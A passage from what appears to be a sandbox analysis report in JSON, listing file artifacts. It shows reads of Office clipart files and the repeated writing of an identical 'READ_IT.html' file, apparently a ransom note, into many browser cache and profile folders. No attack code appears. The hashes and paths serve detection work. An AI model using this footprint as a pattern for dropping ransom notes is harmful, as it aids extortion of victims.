Office\\CLIPART\\PUB60COR\\PH03224I.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph03224i.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH03425I.JPG", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph03425i.jpg", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PRRTINST.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\prrtinst.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL00260_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\sl00260_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SL01565_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\sl01565_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00152_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00152_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00157_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00157_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00177_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00177_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00190_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00190_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00212_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00212_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00257_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00257_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00289_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00289_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00299_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00299_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00305_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00305_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00333_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00333_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00345_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00345_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00350_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00350_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00352_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00352_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00367_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00367_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00416_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00416_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00453_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00453_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00479_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00479_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00603_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00603_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00610_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00610_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00633_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00633_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00683_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00683_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00694_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00694_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00726_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00726_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00768_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00768_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO00820_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so00820_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01044_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so01044_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01063_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so01063_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01236_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so01236_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01560_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so01560_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01561_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so01561_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01563_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so01563_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01566_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so01566_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01568_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so01568_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01569_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so01569_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01575_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so01575_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO01785_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so01785_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02055_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02055_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02413_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02413_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02617_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02617_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02790_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02790_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02791_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02791_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02793_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02793_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02794_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02794_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02862_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02862_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\SO02886_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\so02886_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN00011_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\tn00011_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TN01308_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\tn01308_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00232_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\tr00232_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\TR00233_.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\tr00233_.wmf", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll", "hashes": [], "norm_filename": "c:\\program files\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msmdsrv.rll", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl", "hashes": [], "norm_filename": "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\as80.xsl", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl", "hashes": [], "norm_filename": "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\as90.xsl", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl", "hashes": [], "norm_filename": "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\informix.xsl", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl", "hashes": [], "norm_filename": "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\msjet.xsl", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl", "hashes": [], "norm_filename": "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql2000.xsl", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl", "hashes": [], "norm_filename": "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql70.xsl", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl", "hashes": [], "norm_filename": "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql90.xsl", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Sybase.xsl", "hashes": [], "norm_filename": "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sybase.xsl", "operations": [ "read" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YBZ8BT~1\\AppData\\Local\\Temp\\tmp81BC.tmp", "hashes": [], "norm_filename": "c:\\users\\ybz8bt~1\\appdata\\local\\temp\\tmp81bc.tmp", "operations": [ "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\indexedDB\\moz-safe-about+home\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\roaming\\mozilla\\firefox\\profiles\\5cb79syl.default\\indexeddb\\moz-safe-about+home\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Temp\\scoped_dir_2624_27680\\CRX_INSTALL\\_locales\\uk\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\temp\\scoped_dir_2624_27680\\crx_install\\_locales\\uk\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\OfflineCache\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\offlinecache\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\F\\A2\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\f\\a2\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\F\\94\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\f\\94\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\F\\23\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\f\\23\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\E\\E9\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\e\\e9\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\E\\69\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\e\\69\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\E\\57\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\e\\57\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\E\\45\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\e\\45\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\D\\FE\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\d\\fe\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\D\\08\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\d\\08\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\D\\07\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\d\\07\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\C\\7F\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\c\\7f\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\C\\1F\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\c\\1f\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\B\\E5\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\b\\e5\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\B\\64\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\b\\64\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": "C:\\Users\\YbZ8BTYYvts 7lFSQB0g\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\5cb79syl.default\\Cache\\A\\CE\\READ_IT.html", "hashes": [ { "md5_hash": "b3713b894a8d7f366299a3d0a3449485", "sha1_hash": "fbf640c02b23268c2b3a684b4455f904363fe22a", "sha256_hash": "f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325", "type": "file_hash", "version": 1 } ], "norm_filename": "c:\\users\\ybz8btyyvts 7lfsqb0g\\appdata\\local\\mozilla\\firefox\\profiles\\5cb79syl.default\\cache\\a\\ce\\read_it.html", "operations": [ "write", "access" ], "type": "file_artifact", "version": 1 }, { "filename": 